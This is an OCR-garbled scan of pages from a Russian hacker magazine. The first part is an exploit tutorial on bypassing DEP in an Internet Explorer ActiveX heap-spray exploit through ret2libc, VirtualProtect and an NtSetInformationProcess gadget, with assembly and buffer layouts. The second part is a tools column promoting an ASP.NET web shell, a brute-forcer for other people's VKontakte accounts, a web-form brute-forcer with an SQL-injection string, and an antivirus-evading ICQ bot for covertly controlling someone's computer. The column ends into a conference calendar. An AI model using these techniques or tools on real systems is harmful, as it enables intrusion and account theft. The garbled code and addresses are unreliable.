тиігіС0)сіі5кС0)гсІі5кС0)рагтітіоп(і)\^імсю\Ѵ5= ,, мі егозой Ѵ'/іпсІоѵѵз хр 
Ргоі^ег^іопаі РУ" /Та5Те)еіесі /МоЕхесиге=Ор10и1 

Настройки РЕР 




С РП Сол Г Ідигаі I он 



(Кіегеісигк Мшіо 

СРП Ргециепсу (МН г) 
РСІЕ Рге^ішпеу (МНг> 
Вооі Ра П иге Сиаг <1 
ЗргеаЛ Зресігим 

Ка I і о АсІиа I Оаіие 

ЕтіНалсеа На 11 Зіаіе 
Мак СРШВ Оаіие ІЛіяіі 
СРО Піегмл 1 ТЬгоіІІ Іііу 



ІпіеНЕО ЗрывіІЗІ'нр (±ш) ІесІЬ. 




ГОиІсіІ 



■4 — Ь 


Зеіесі Зсгееп 


Ті 


Зеіегсі Нем 


♦ - 


СЬапдс Орііон 


Р1 


(напета! Неір 


Г9 


ІоаД ВеГаиНз 


РІО 


Заме аиД 


Е5С 


Екіі 



иЩ *61 СОСоругІцМ. 1985 - 2006 , Пт? г 1 пап Мёггп КгйѴігіг 



Включаем йХбит 

/поехесиБе=ОрБОиЦ — по умолчанию в 
ЭДіпЙОШ Зегѵег 2 003 ЗР1 . БЕР для 
всех процессов, кроме указанных 
пользователем . 

/поехесиБе=АІѵ\гауз0п — БЕР для 
всех, нет исключений. 
/поехесиБе=АІѵ^аузО^Е — БЕР отклю- 
чен для всех (даже для системных 
компонент) . 

Потом перезагрузка. Посмотреть результат 
работы можно Эузіпіегпаіз Ргосезз Ехріогег’ом 
товарища Марка Руссиновича. В случае 
зо^ѵѵаге-БЕР и политики ОрЮиІ, мой ІЕ7 ста- 
новится под защиту. И правда, эксплойт из 
предыдущего номера, который использует 5ЕН 
для выхода на шеллкод в куче, не сработал, так 
как защитный механизм определил, что адрес 
переписанного дескриптора не находится в 
его списке. Однако данная защита достаточно 
надежно обходится и есть много материалов 
на английском и русском языке. Я не буду тут 
их описывать, хотя бы потому, что в нашем 
случае мы еще контролируем регистр вызова 
САН и адрес возврата. Таким образом, кроме 



перезаписи 5ЕН у нас есть еще два варианта 
передачи управления на кучу с шеллкодом. 
Например, второй эксплойт (есть на диске про- 
шлого номера], использующий вызов «САН 
[Е5І+СС]» в уязвимом коде, успешно работает 
в режиме зоЙѵѵаге-ВЕР Кстати, предлагаю 
читателю самостоятельно усовершенствовать 
второй эксплойт, сделав так, чтобы он делал не 
две разные кучи, а одну большую как в первом 
5ЕН-эксплойте (в прошлом номере я описывал 
упрощенную генерацию Ьеар-зргау. 

В общем, случай с зоіАл/аге-ВЕР, неинтересен 
для нас, поэтому рассмотрим ЬагсІѵѵаге-БЕР 
(используя процессор с поддержкой бита ЫХ/ 
ХВ]. В таком варианте, что любопытно, 5ЕН уже 
не проверяется на изменение, но и шеллкод 
также не исполняется. В обоих вариантах экс- 
плойта, управление успешно перешло в кучу 
с шеллкодом, однако на первом же ІЧОР’е 
возникла исключительная ситуация — Ассезз 
ѵіоіабоп ѵѵбеп ехесибпд [СЮСЮСЮСЮ]. А произо- 
шло это потому, что страница памяти под кучу, 
созданная с помощью ЭаѵаЗсгірІ; Ьеар-зргау, 
помечена как неисполняемая. В этом можно 
убедиться, открыв в дебаггере карту памяти 



процесса и посмотреть, что напротив наших 
кучек нет буковки «Е» в столбце «Ассезз». 

РЕР 15 ОЕАО 

В Сети сложено много материала, на тему обхода 
БЕР В основе всех техник лежит концепция, 
получившая название «геі21іЬс». Раз мы можем 
передавать управление только в исполняемые 
области памяти, то воспользуемся этим. Ведь 
есть много полезных функций, код которых, 
естественно, лежит в исполняемой области, 
например, ѴѴіпЕхес. Достаточно, заменить адрес 
возврата на адрес функции ѴѴіпЕхес и передать 
через стек пару параметров — и все — мы выпол- 
нили запуск приложения! Конечно, это удобно 
для демонстрации уязвимости, но практическое 
применение достаточно ограниченно — одно 
дело выполнить несколько функций, и совсем 
другое связать их ввод-вывод, как например, 
инициализация/открытие сокета, обработка 
соединений и организация ввода/вывода для 
стб.ехе (классический шеллкод]. Такую задачу, 
одними вызовами функций не решить. 

Однако это уже что-то. Так, например, можно 
сделать несколько последовательных вызовов 
функций и что-то сделать с текущим процес- 
сом. В 2005 году был предложен простой метод 
обхода БЕР и передачи управления шеллкоду. 
Вместо адреса возврата, подставлялся адрес 
функции ѴігіиаІАИосО — для выделения памяти. 
Причем в параметрах для этой функции указыва- 
ется, что память нужно пометить как исполняе- 
мую, кроме того мы не должны выделять новый 
кусок, так как в таком случае мы не знаем адрес 
этой памяти (черт его знает, где он выделит кучу], 
мы «обновляем» память на уже выделенном 
сегменте, который не будет использоваться до 
шеллкода. Далее идет адрес функции тетсруО, 
которая копирует в выделенную нами память 
шеллкод. Завершает все действо адрес возврата 
из тетсруО, который как раз указывает на пере- 
созданную область памяти с шеллкодом, который 
уже помечен как исполняемый. В нашем же 
случае, память уже выделена, и шеллкод там 
уже есть, и адрес мы знаем. Достаточно вызвать 
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Ѵіг1иоІРгоІ«сІ() 



ОхОООООСЮР 



ОхСЮОРОРОО 



ОхОРОООРОР 



ОхОООРОРОР 



0 х 0€€€€001 



0X00000040 



АДРЕС ВОЗВРАТА 



АДРЕС ВОЗВРАТА 
ПОСЛЕ ѴігйіаІРгоІесЦ) 



ПАРАМЕТРЫ 

ѴІНтІРгоіесІ 



|аиі>м^а.а№*. <«м№і Г :дті ин<к- 



0x05050505 



Ргосезз Ехріогег показывает 
процессы с йЕР 

функцию ѴіііиаІРгоІесШ- Но, к сожалению, есть 
одно «но» — мы не можем передавать параме- 
тры с нулевыми байтами, а вызов ѴіііиаІРгоІесШ 
предполагает передачу флага доступа (третий 
параметр, флаг должен быть 0x000040 — РѴѴХ) и 
размер памяти. Эти параметры должны содер- 
жать нули. 

ѴігкиаІРгокесб ( 

ІБ ЬРѴОІВ ІрАсІсІгезз , 

// указатель на адрес памяти - 
ОхОВОВОВОВ 

ІБ ЗІ2Е_Т склгЗ і 2 е , 

// Размер памяти — 0x1 

ІБ ВШЕБ ОБемРгобеск, 

// флаг - 0x40 

ІБ РВЖЖВ ІрПОІбРгокесб 
// указатель, на память, куда 
запишется ответ (старые флаги), 
пусть 0x05050505 



СТЕК 

Идея с ѴігІиаІРгоІесІ 



Бороться с нулевым байтом дело неблаго- 
дарное. Что еще нам предоставляет ѴѴіпбоѵѵз 
АРІ для борьбы с БЕР’ом? В ѴѴіпбоѵѵз 
ХР 5РЗ (у меня как раз такая] появилась 
новая АРІ функция — ЗеіРгосеззБЕРоІісуО, 
которая может просто-напросто отклю- 
чить БЕР Да, но опять-таки, в качестве 
параметра должен быть ноль. Опять мимо. 

На самом деле ЗеіРпосеззБЕРоІісуО явля- 
ется всего лишь оберткой для функции 
ЫіЗебпІюгтабопРгосеззО: 

БкЗебІпбогтабіопРгосезз 

( 

ІБ НАБВЬЕ РгосеззНапсПе , 

// Дескриптор процесса, Охій: — 
текущий процесс 

ІБ РКОСЕЗЗ_ІБРОКМАТІОБ_СЬА83 
РгосеззІпбогтабіопСІазз , 

// 0x22 — смена флагов процесса 




Із га ьія— І ссвчіи 



бнИг, іироКі 
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Исполняемыхучастков нетакуж 
много 



ІБ РѴОІБ РгосеззІп^огтаСіоп , 

// Указатель добавляемый флаг 
чтобы отключить ВЕР для про- 
цесса, указатель должен быть на 
0x0000002 

ІБ БЬОБС 

Ргосезз ІпбогтабіопЕепдбІі 
// размер флага — (0x4) 4 байта 
) ; 

Но и эту функцию мы не можем вызвать 
по тем же причинам — зловещие нулевые 
байты! Казалось бы, что еще можно найти? 
И вот бравые парни «Экаре» и «Екуѵѵіпд» 
нашли такое место в коде пібЦ.бК: 

АсМгеззІ : 

сшр аі , 0x1 ; младший разряд ЕАХ=1 ? 

ризЪ. 0x2 ; заносим в стек 0x2 
(Самое главное) 

рор езі ; вынимаем из стека, что 
там есть (0x2) и кладем в ЕЗІ 
^е ЬбгрСйескБХСошрабіЫІібу + 0x1а 
; Если младший разряд ЕАХ=1 прыгаем 

шоѵ [еЬр-0х4 ] , езі ; копируем 
0x2 (лежит в ЕЗІ) по адресу ЕВР-4 
зтр ЕбгрСЬескБХСотрабіЫІібу + 

Охіб ; прыгаем дальше 



; проверяем, равен ли наш пара- 
метр 0? (мы только что скопирова- 
ли туда 0x2 ) 

сшр бдлгогсі рбг [еЬр-0х4 ] , 0x0 

;іпе ЕбгрСкескБХСотрабіЫ1ібу+0х46 
; ну раз 41=2, прыгаем дальше 



ризЪ. 0x4 ; в стек 0x4 

Іеа еах, [еЬр-0х4] ; в ЕАХ адрес 

еЬр-0х4, то есть указатель на 0x2 



► 070 
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ВЕР можно просто-напросто отключить 
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ризЪ. еах ; кладем указатель на 
0x2 в стек 

ризЬ. 0x22 ; 0x22 в стек 

ризЬ. Охіі ; Охіі (-1) в стек 
саіі ШРЗеРІпіогтаРіопРгосезз 
; вызов нужной функции, с нужными 
; параметрами — отключение БЕР 
;]тр ЬсІгрСЛескШХСотраРіЪіІіРу + 
0x5 с ; прыжок . . . 



рор езі 

Іеаѵе ; удаляем локальный стек 
геР 0x4 ; берем адрес возвра- 

та со сдвигом в 4 байта 

Если в качестве адреса возврата указать адрес 
этого куска кода, то процессор, выполнив первый 
прыжок (а для этого в Аб должна быть единица] 
отключит О ЕР и доберется до следующего адре- 
са возврата из стека, который будет указывать на 
кучу с кодом. Тут надо только заметить, что адрес 
возврата должен быть с некоторым сдвигом, 
так как «6ЕАѴЕ» удалит большой сегмент стека, 
а, по сути, сделает Е5Р = ЕВР Главное, чтобы 
младший регистр ЕАХ был равен 1. Опять же, 
для этого можно первоначально прыгнуть на код, 
который устанавливает этот регистр в значение 
1. Другими словами, переписываем адрес воз- 
врата, адресом функции, которая заносит в Аб 
единицу, например в той же пШ.сІІА: 

Аббгезз2 

шоѵ аі , 0x1 

геР 0x4 

Тогда входной буфер будет, типа: 

СССС...2 б 0...ССССААААІ б і ІВВВВССССХХХХХ 

XXX... 1 0 0 ...ХХХХХХХХХХХ 

АААА=0х05050505 

ВВВВ=Аск1гезз2 

СССС=Аббгезз1 

Х=0х0Б 

РІБНТ! 

С помощью ОНуйЬд выполняем аттач (Еііе- 
>АИасГі] к процессу іехріоге и пытаемся 
найти в карте памяти секцию .собе в пісНЫІІ 
(Ѵіеѵѵ->Метогу). Открываем ее в дизассем- 



блере и ищем последовательность команд 
Ш+5): 

аі , 1 

гебп 0x4 

Это будет адрес Аббге5з2. Аналогично ищем 
Аббгеззі по последовательности команд: 

стр аі , 0x1 

ризк 0x2 

рор езі 

Теперь надо довести программу до адреса 
возврата без проблем, то есть, чтобы не было 
исключительных ситуаций. Анализируя ассем- 
блерный код видим, что зависимость прыжков 
зависит от регистра Е5І. В первый раз, там, где 
возникает исключительная ситуация, при «СМР 
[Е5І+1 80], 1 ». Потом идет такой код: 

хог еЬх, еЬх ; обнуление 
ризк -1 

стр [Е8І+СС] , ЕВХ ; сравнение с 0 

В зависимости от этого сравнения идет либо 
вызов «САЕб [Е5І+СС]», либо нет. Нам лишних 
вызовов не надо, поэтому нам надо, чтобы по 
адресу Е5І+СС был 0. Таким образом, если там 
будет 0, программа постепенно дойдет до геб и 
выйдет в вызывавшую ее функцию: 

саіі етзтбр . 02 бсб232 ; только что 

отсюда благополучно вышли... 

хог еах, еах ; обнуляется результат 

рор есіі ; восстанавливаются реги- 
стры 

рор езі 
рор еЬх 

Іеаѵе ; чистится стек 

гебп 0x8 ; указатель на НАШ 

адрес возврата (АААА) 

Теперь проблем нет — мы делаем две кучи, 
как в эксплойте из прошлого номера, в первой 
куче одни нули, во второй — ІМОР’ы и шеллкод. 
Регистр Е5І переписываем 0x05050505, указа- 
тель на 0 из первой кучи, а адрес возврата — по 
указанной схеме, только увеличивая разницу 
между ВВВВ и СССС, так при выходе на ВВВВ у 



-Агд4 = 4 

АгдЗ -> ОРР8ЕІ ЦЭСЙ!_Л 

Йгд2 = 22 
ЙгдІ - -1 

•пъЗі І.И$$еъІп*оггоаЪ іолРгосеъъ 

нас геіп 8. Итоговый буфер: 

СССС...2 60...ССССААААббббВВВВббббббббС 

СССХХХХХХХХ...1 0 0... ХХХХХХХХХХХ 

Но здесь возникают две проблемы. Во время 
чистки стека, перед выходом на первый адрес 
возврата ЕВР становится 0x4646464646 — мусо- 
ром, который указан в буфере перед адресом 
возврата(ВВВВ). В таком варианте мы не смо- 
жем вызвать функцию отключения ОЕР, так как 
там ЕВР используется для хранения 0x2: 

тоѵ [еЬр-0х4 ] , езі 

Это можно обойти, указав адрес из кучи, но 
тогда, потом куча станет стеком, когда выпол- 
нится «Іеаѵе» после КкЗеОпіюгтаОопРгосезз! 

Но есть еще одно «но» — адреса возврата, 
которые мы подсунули в стек (ВВВВ и СССС], 
не соответствуют тем, что мы запихнули в 
буфер. Дело в том, что наш АсбіѵеХ понимает 
только А5СІІ набор байтов. Все что больше 
0х7С, АсбіѵеХ превращает в значки «?» — ОхЗЕ. 
Эта проблема сильно подрывает задуманную 
акцию, так как нужные нам адреса имеют 
значащие разряды со значением больше чем 
0х7С. Я почти было отказался от идеи демон- 
стрирования обхода ОЕР’а, на примере этого 
АсбіѵеХ. Однако вспомним, что у нас есть один 
«САЕб [Е5І+СС]» в коде программы, который 
мы можем использовать. Для попадания в этот 
вызов, достаточно, чтобы по адресу Е5І+СС 
не было нулевого значения, что само собой 
решается, ведь мы заносим туда адрес. Этот 
адрес берется из кучи, в которой могут быть 
любые байты! Но САЕб у нас всего один. Мы 
можем вызвать только одну функцию. Логично 
предположить такой вариант: с помощью САЕб 
мы отключаем ОЕР, а потом адресом возврата 
прыгаем на кучу с шелл кодом, и уже без про- 
блем выполняем код. Но перед вызовом САЕб 
у нас Аб не равен единице, что означает, что 
при «іе ЕбгрСНескЫХСотрабЬШ1:у+0х1а» мы не 
перейдем в прыжок и не отключим ОЕР. Но нет 
худа без добра, ведь перед тем как делать САЕб, 
у нас идет вызов функции из АсбѵеХ, которая 
перед своим завершением вызывает функцию 
МиШВуіеТоѴѴісІеСЬагО. В ней последнее срав- 
нение заканчивается так, что бит I становится 
равным единице. Что это значит? А это значит, 
что нам не нужно вообще сравнение, чтобы 
перейти по необходимому іе. У нас уже 2=1 , и 
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неважно, где было сравнение. Таким образом, 
мы настроим прыжок не на «СМР АІ_,1», а на 
2 байта выше, туда, где уже «РІІ5Н 2». Таким 
образом, далее мы перейдем по \е и выполним 
отключение ЭЕР После этого, код успешно 
доберется до адреса возврата и перейдет на 
кучу с шелл кодом. Итоговый буфер: 

СССС...2 60...ССССАААА^^^^ВВВВ 

АААА = 0x05050505 — указатель на первую кучу, 
которой лежит Асісігеззі 

ВВВВ = ОхСЮСЮСЮСЮ — адрес возврата, на вто- 
рую группу куч с шелл кодом 
Теперь, собственно, нужно подставить 
Абсігеззі в первую группу куч. В моем слу- 
чае, адрес — 0х7С9 1 С 026. Но он зависит 
от версии пШ.сІІІ. Если этот адрес указать 
неверно, то эксплойт с большой вероятно- 
стью не обвалится, а попробует выполнить 
шеллкод, но уже без отключенного ОЕР’а. 
Кроме того, нужно учитывать все сдвиги в 
самой куче, относительно ее начала. Если 
с адресом ОхСЮСЮСЮСЮ нет косяков, так 
как все разряды одинаковые, то в данном 
случае можно столкнуться стой пробле- 
мой, что по адресу, на который указывает 
САЩЕ5І+СС] (0x05050501) будет лежать, 
например, 0х267С9 1 СО. Чтобы не ошибиться 
с адресом кучи, я предлагаю произвести рас- 
чет: заголовок кучи — 36 байт. Наш «спам» 
адресов начинается через 36 байт, после 
начала базового адреса. Спамим мы в акку- 
рат по 4 байта. То есть, рассчитать адрес 
надо так, чтобы попадание было только при 
наличии базового адреса (он не бывает оди- 
наковым каждый раз, тем более на разных 
системах). Однако, по той же карте памяти 
можно заметить, что при выделении больших 

Идея с ІЧіЗеІІпГогтаІіопРгосезз 
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адрес кода 
установки АІ_ 



0x11111111 



0x11111111 



адрес кода 
откл. РЕР 



0x11111111 
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стр [езі+180],1 

саіі етзлггі.хххх 
саІІ [езі+сс] 
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Итоговая схема атаки на йЕР 

блоков памяти, больше двух младших раз- 
рядов, каждая новая куча будет начинаеться 
с ОхХХУУОООО. И логично предположить, что 
наш адрес начинается с 0хХХУУ0024 (и так 
далее + 4 байта). Поэтому последний разряд 
должен быть кратен 0x4, а так как у нас +0хСС 
и получается, что разряд становится ОхШ. 
Поэтому увеличиваем исходный адрес на 0x3 
и тогда внедрять мы должны 0x05050508. При 
написании эксплойта не забываем, что у нас 
Шіе-епсііап порядок байтов. 

В итоге рождается хороший эксплойт (его в 
целях ознакомления ты можешь лицезреть на 
нашем 0\Ю). 



АДРЕС ВОЗВРАТА 



АДРЕС ВОЗВРАТА 



X блоков, 
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ВЫВОДЫ 

В данной статье мы рассмотрели некото- 
рые виды атак на ОЕР и даже попробовали 
одну из них в реальных условиях, изменив 
ее под реалии эксплуатации уязвимости. 
Также очевидно, что исследование кода 
приложения помогает понять как можно 
использовать те или иные возможно- 
сти уязвимого кода, усиливая эффект от 
атаки, а в нашем случае мы даже упро- 
стили отключение ОЕР. Так, например, 
тот факт, что 1 бит всегда установлен в 
единицу перед вызовом САН с контро- 
лируемым через кучу адресом, позволил 
нам модифицировать алгоритм атаки так, 
что назвать ее классической уже нельзя, 
хотя применяется все тот же геС21іЬс под- 
ход. Однако показанные механизмы не 
будут работать в ОС со случайной адреса- 
цией памяти (А5БВ), так как мы не будем 
знать адреса функций ѴігСиаІРгоСесІ: или 
ШВеіІпіюгтаІіопРгосезз. При каждом запу- 
ске процесса — эти адреса будут меняться. 
Кроме того, в ІЕ8 ЭЕР перманентный. Это 
значит, что при запуске ІЕ8 ставит себе 
ЭЕР по умолчанию (с помощью функции 
ЗеіРгосеззОЕРРоІісу). Это уже исключает 
возможность снятия БЕР-флага с процесса 
методами геі21іЬс, так как в таком случае 
ІХКЗеіІпіюгтаЕопРгосезз вернет ошибку 
с отказом в доступе. Но и это уже не про- 
блема, ведь буквально в начале февраля, 
когда эта статья только задумывалась, на 
ВІаскНаС 2010 ОС, Дионисисом Блазакисом 
(Эіопузиз Віагакіз] была продемонстриро- 
вана атака на ІЕ8 с А5БР(случайная адре- 
сация) и ЭЕР. Атака использует возмож- 
ности компиляторов АсСіопЭсгірС или Оаѵа, 
которые помещают скомпилированный код 
в исполняемые участки памяти. Этот метод 
получил название ЛТ-зргау, но это уже 
совсем другая история... □с 
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интерфейс утилиты 



Наверняка перед тобой часто вставала пробле- 
ма поиска большого количества рабочих прокси 
(например, для накрутки счетчиков, парсинга 
поисковиков, брута асекит.д.]. Если это та к, то 
ты знаешь, что одновременно бесплатного и 
быстрого варианта не бывает, так что советую 
тебе воспользоваться буржуйской опенсорс 
утилитой РгохРеІсИ от команды хі тасЫпе.сот . 
Итак, РгохРеІсЬ — это кроссплатформенная 
прога, которая собирает прокси и соксы с 
сайтов, затем проверяет ихживучесть и выдает 
тебеудобочитаемый список, состоящий из 
валидных ір и портов. Особенности тулзы: 

• возможность сохранения списков 
прокси в файл; 

• написана на с++, что влечет за собой 
кроссплатформенность ; 

• интуитивно понятный интерфейс; 

• удобный и подробный хелп; 

• большой список предустановленных 
сайтов для граббинга проксей; 

• встроенный СеоІР; 

• чекер живучести прокси; 

• продвинутая логгинг- система; 

• возможность коннекта через ТОК; 

• возможность отмены любого действия. 

За остальными подробностями об интерфейсе и 
работе РгохРеІсЬ отправляйся на официальный 

сайт хі тасЫпе.сот/?р=72 . 

ПРОГРАММА: К-5НЕІ.І. 

ОС: ѴѴІЫ00ѴѴ5 2000/2003/ХР/ѴІ5ТА/7 
АВТОР: КІКІСОСО 

Давненько мы не размещали на страни- 
цах рубрики никаких шеллов. Настала 



пора исправлять это недоразумение :]. 
Представляю твоему вниманию К-5Иеи — 
скрипт, написанный на АЗР.ЫЕТ неким хакером 
из Вьетнама и представляющий собой не что 
иное, как шелл для винды в связке с N5. 

К-ЗбеЕ обладает всем основным функционалом 
«старших братьев», написанных на РНР: 




К-5НеІІ в деле 

• защита шелла паролем (шб5) ; 

• выполнение команд (через СМБ.ЫЕТ, 

Ш2, МЗН, ЗОЬЗегѵег) ; 

• вывод списка процессов (два спо- 
соба) і 

• отображение информации о системе 
(Зегѵег ІР, Масйіпе Ыагпе, ЫеШогк 
Ыате, бзег Ыате текущего процесса, 

ОЗ Ѵегзіоп, ЗузбешТіше, версия ИЗ, 
порт сервера, информация о клиенте, 
переменные окружения, инфо о желе- 
зе) ; 

• клонирование времени модификации 
файла / папки ; 

• список юзеров системы; 

• сканер портов; 

• отслеживание активности ИЗ; 

• редактор реестра; 

• системный и еѵепб логи; 

• операции с файлами и папками (ре- 
дактировать, вырезать, копировать, 
переименовать, скачать, удалить, 
загрузить, создать) ; 

• отображение основной информации о 
файлах . 

Как видишь, все эти возможности позволяттебе 
с комфортом обустроиться на нужном виндовом 
сервере и изучить его вдоль и поперек. 

ПРОГРАММА: ІСО ЕХАМВОТ 

ОС: ѴѴІЫ00ѴѴ5 2000/2003/ХР/ѴІ5ТА/7 

АВТОР: ѴѴѴУѴѴ.ЫАКООІМ.Ки 

Хочешь научиться сдавать любой экзамен 
или зачет по-хакерски? Тогда предлагаютебе 
заюзать программу ІСО ЕхатЬоІ: от команды 

пакосііпп.ги . 

Эта прога создает ісц-бота, который сможет 
датьтебе ответ практически на любой экзаме- 




настройкабота 

национный вопрос с помощью редактируемой 
базы шпаргалок. 

Каждая шпаргалка в данной базе имеет свой 
номер, размер одной шпаргалки не должен 
превышать 5000 символов (1200 — при добав- 
лении вопроса прямиком из ІСО). 

Таким образом ты сможешь найти нужный тебе 
материал в заранее подготовленных шпаргал- 
ках, добавлять эти шпаргалки и читать их по 
номерам. 

Особенное удовол ьствие доставляет тот факт, 
что программа нетребует много ресурсов сис- 
темы и высокой скорости подключения к Сети 
(работает на .ІЧЕТ Егатеѵѵогк 2.0). 

Удачной сдачи! :) 

ПРОГРАММА: Ѵкоытакте Мш.ті- 
Тнреарз Вріітерорсе ѵѵітн АытіСартнса 
&& Ррохѵ 
ОС: *ЫІХ/ѴѴІЫ 
АВТОР: ОР.ТРО 

Если вдругтебе понадобилось вспомнить па- 
роль от своего аккаунта в Известной Социаль- 
ной Сети (ну или отаккаунта своей подружки 
:), то советую воспользоваться замечательным 
мультипоточным брутфорсом от Ог.ТРО, напи- 
санным на Регі. 

Запускается скрипт следующим образом: 

регі Ьгибе.рі <Щлгеас1з> <ргоху 
скапде біше> <раизе> <апбісарбсЪ.а 
кеу> <ассоипбз Іі1е> <раззтлгогсІз 
Іі1е> <ргоху Іі1е> <поЬаб> <зр1ікег> 

Передаваемые брутфорсу параметры означают 
следующее: 

<ЦЬхеас1з> — число потоков; 

<ргоху сйапде біте> — количество 
попыток брута, через которое прокси 
будет изменен; 

<раизе> — пауза между попытками 
брута ; 

<апРісарбсЪ.а кеу> — кей антикапчи; 




/ а : 



/ Ц 
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запуск брутфорса 

<ассошібз :Еі1е> — файл со списком 
аккаунтов ВКонтакта; 

<раззѵ\гогс!з 1і1е> — файл с паролями 
для брута; 

<ргоху бі1е> — файл со списком прок- 
си; 

<поЬаб> — не записывать в лог неудач- 
ные попытки брута; 

<зр1іВег> — разделитель для логинов 
и паролей. 

Внимание! Для использования брутфорса 
необходима перловая библиотека АпбСарісНа. 
рт, которую ты также сможешь найти на диске. 

ПРОГРАММА: [ѴѴЕВ] ВРІІТЕ 
Р0ВСЕВѴ1.1 

ОС: ѴѴІЫ00ѴѴ5 2000/2003/ХР/ѴІ5ТА/7 
АВТОР: [Х26]Ѵ0І_АЫ0 

Какчастоты сталкивался с админками, закры- 
тыми паролем через Ьазіс-авторизацию или 
просто через веб-форму? Если в таком случае 
для успешной авторизации не прокатывала 
обычная скуль-инъекция вроде«1' о г 1=1/*», то 
приходилось очень долго мучиться с нужным 
сайтом или вовсе оставлять попытки его 
взлома. С брутфорсом [ ѴѴеЬ ] Вгиіе Рогсегот 
мембера Античата [х26]ѴОЕАЫОтвои шансы на 
проникновение очень сильно повышаются :). 
Возможности проги впечатляют: 

• брутфорс методом Р08Т; 

• брутфорс методом СЕТ; 

• брутфорс Ьазіс-авторизации методом 
НЕАБ; 

• брутфорс ЕТР; 

• многопоточность (от 1 до 100 0 по- 
токов) ; 

• возможность установки дополнитель- 
ных КЕ<21Ш8Т переменных; 

• возможность установки Соокіез; 

• брутфорс с использованием прокси 
(встроенный ротатор прокси с функци- 
ей авточека и настраиваемой автосме- 
ной) ; 

• 3 режима атаки (1 логина, несколь- 
ких логинов, по 1 паролю) ; 

• встроенный браузер ріаіп НТМЬ с 
подсветкой тегов іприб и показом за- 
головков, полученных от сайта; 

• менеджер словарей (генерация, 
склейка, разбивка) . 




брутфорсер веб-форм 

Чтобы работать с брутфорсом, нужно перенести 
данные веб-формы в программу. 

Для этого открываем сорцы страницы и нахо- 
дим тег <Еэгт>. Далее в этом теге ищем атрибут 
«асбоп» и вставляем и гі из этого атрибута в 
поле«Целевой ІІРб». Теперьсмотрим назна- 
чение атрибута «тебпосі» и соответственно ему 
в ы ста в л я е м ч е кб о кс « П р ото кол / М ето д ата к и » . 
Затем внутри нашего тега <к>гт> ищем теги 
<іпри1> (такназываемые«поля»]. Нам нужно 
получить поля идентификаторов, то есть поля, 
в которых передаются логин и пароль при 
отправке на сервер. 

Ищем втеге <іпри1> атрибут«пате». Если его 
содержимое похоже на «Іодіп», «піскпате», 
«изегпате» и т.д.,то это и есть поле логина. 
Копируем атрибут«пате» в поле «Логин» 
нашей программы. Аналогично поступаем с 
полем «пароль». 

Также надо перенести дополнительные поля 
(атрибуты «пате» и «ѵаіие») в раздел «Допол- 
нительные гециезі;- переменные». 

Если внутритега <іюгпп> есть <іпри1> стипом 
Еуре=«зи Ьт іі», то это кнопка логина. Перено- 
сим ее атрибуты в программу в раздел «Атрибу- 
ты ЗиЬтТ-кнопки». 

Если у какого-либо тега <іпри1> нет атрибута 
«пате», то он нас не интересует. 

Теперь выставляем текстовый индикатор ус- 
пешного входа. Это важный параметр, который 
будет различным для каждого сайта. По этому 
индикатору программа будет решать, произо- 
шёл ли успешный входили нет (если указанный 
текст отсутствует/присутствует в исходнике 
страницы, то логин считается успешным]. 

В качестве индикатора можно использовать 
фрагмент кода формы (таккакона заведомо 
будет отсутство вать в стра н и це п р и уда ч н о й 
попытке], либо, еслиты имеешьаккаунтна 
атакуемом сайте, использовать фрагмент кода, 
который однозначно присутствует в странице 
при удачной попытке (например код кнопки 
«Выхода» с сайта]. 

Осталосьтолько выставить (при необходимос- 
ти] кукисы, которые нужны атакуемому сайту и 
выбратьтип перебора. Ещоу! 

Если утебя есть предложения и пожелания 
по работе брутфорсера, направляй их втопик 
Ьгит.апбсбаЕгиЛбгеасІІ 09600. Ы:тЕ :] 



ПРОГРАММА: ІС05РУ ВОТѴІ.О 
ОС: ѴѴІ N йОѴѴБ 2000/2003/ХР/ 
ѴІ5ТА/7 

АВТОР: ІЫБШЕР 



ІС<3 5РУ ВОТ ѵ 1.0 




Настройки: 
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интерфейс бота 



Представляю тебе идеальное средство для 
удаленного управления дедиком/компьютером 
недруга — I С 0 3 РУ ВОТ. 

Как видно из названия, прога можетскрыто 
управлятьудаленной машиной с помощью 
обычной аськи. 

Бот обладает следующими достоинствами: 

• высокая скрытность; 

• не палится антивирусами; 

• при установке копируется в систем- 
ный каталог; 

• автоматически добавляется в авто- 
загрузку; 

• контролируется повторный запуск 
бота; 

• малый размер используемой памяти 
(до 800 Кб максимум) ; 

• стабильное подключение к ІС<2 сер- 
веру; 

• переподключается в случае обрыва 
связи; 

• получение ІР удаленнной машины; 

• перезагрузка удаленной машины; 

• перезагрузка бота; 

• выключение удаленной машины; 

• получение списка процессов и 
РІБ; 

• получение списка установленных 
программ; 

• получение списка системных папок; 

• возможность завершения процессов 
по имени; 

• скачивание файлов на удаленную 
машину по игі ; 

• запуск любых файлов; 

• показ окна с ошибкой; 

• удаление папок и файлов . 

Единственная проблема, над которой тебе 
надо будет подумать при установке бота — это 
обход файрволов. В остальном же автор дает 
нам гарантии, что прогу нельзя заметить 
невооруженным взглядом, так что советую 
попробовать данное чудо технического про- 
гресса Т 
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ТАМ БУ 



КАЛЕНДАРЬ ХАКЕРСКИХ 



ТУСОВОК 201 0 



Прошлой осенью мы уже составляли для тебя календарь 
интересныххакерских мероприятий на осень-зиму 
2009 — в него вошли самые заметные форумы, конферен- 
ции, Іап-пати и прочие ивенты. 

И вот отгремели новогодние праздники, все мы пришли 
в себя, вычистили остатки «Оливье» из клавиатуры, и 
потихоньку начали настраиваться на приход весны. Ну а где 
весна, там недалеко и до лета — жаркой поры отпусков и не 



только. Дело в том, что клевых, ориентированных на нашего 
хакерского брата мероприятий с каждым годом становится 
все больше, и самый пиксезона, как правило, приходится 
именно на весенне-летний период. Словом, мы подумали и 
решили, что календарь на первую половину 2010 года тоже 
будет совсем нелишним. Если не хочешь пропустить ничего 
интересного и желаешь провести время с пользой, этот 
список для тебя. 



САРОШАШ 

КОГДА: 19 -21 МАРТА 

ГДЕ: Роли. США 

САЙТ: ѵѵѵѵѵѵ.сагоііпасоп.огд 

Конференция СагоІіпаСоп далеко не самое 
старое и многочисленное из хакерских сборищ 

— оно проводится лишь с 2005 года, но все 
же является довольно заметным событием. 

Это классическая конфа, созданная хакерами 
для хакеров, проходящая «без галстуков» и 
спонсорства со стороны Місгозоіф ІпТеІ и иже 
с ними. Своим происхождением СагоІіпаСоп 
обязана ряду бывших членов команды 2600. 
Что может обсуждаться на таком мероприятии? 

— спросишьты. Для начала скажу, что добрых 
дветрети докладчиков зарегистрированы под 
никнеймами вместо имен, а также при веду для 



примера пару заявленных топ и ков: «почему 
І_іпих плох для бизнеса?», «киберпреступле- 
ния и ответные действия правоохранительных 
органов», «это неуязвимости, это будущее», 
